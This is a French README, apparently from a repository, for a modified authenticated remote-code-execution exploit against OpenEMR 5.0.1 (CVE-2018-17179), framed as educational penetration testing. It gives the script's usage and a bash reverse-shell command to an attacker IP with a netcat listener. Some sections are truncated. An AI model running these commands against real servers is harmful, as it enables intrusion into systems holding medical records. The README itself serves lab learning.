
Exploit d'exécution de code à distance authentifié pour OpenEMR 5.0.1 (CVE-2018-17179) avec des payloads de commande personnalisables et support de reverse shell pour les tests de pénétration éducatifs.
⚠️ Avertissement
Ce dépôt est destiné uniquement à des fins éducatives et de recherche.
Les informations et le code fournis ici peuvent être utilisés dans des environnements contrôlés, tels que des machines de laboratoire privées.
Toute utilisation non autorisée de ce code contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test est illégale et contraire à l'éthique.
L'auteur n'est pas responsable de tout usage abusif ou des dommages causés.
CVE-2018-17179 affecte OpenEMR, un logiciel open-source largement utilisé de dossiers médicaux électroniques et de gestion de cabinet.
Une faille dans le mécanisme d'authentification du point de terminaison rest_routes.php permet à un utilisateur authentifié d'exécuter des commandes arbitraires sur le serveur.
Cela peut conduire à une exécution de code à distance (RCE) dans le contexte de l'utilisateur du serveur web.
interface/main/main_screen.php via rest_routes.phpCe dépôt fournit une version modifiée de l'exploit public d'Exploit-DB :
Dans cet exploit personnalisé :
Ciblage d'un panneau de connexion OpenEMR de test local :

Usage: python2 exploit.py <target_url> -u <username> -p <password> -c <command>
Example:
python2 exploit.py http://<target>/openemr -u admin -p secretpass -c 'id'
rest_routes.php.
Exécuter l'exploit
J'ai exécuté le script d'exploit modifié avec une charge utile de reverse shell bash :
```bash
python2 exploit.py http://<target>/openemr -u <username> -p <password> -c 'bash -i >& /dev/tcp/<your-ip>/4444 0>&1'

L'écouteur Netcat sur le port 4444 a reçu avec succès un reverse shell :
nc -nvlp 4444

Consultez la procédure détaillée et la théorie sur mon post Medium :
👉 Lire le blog sur Medium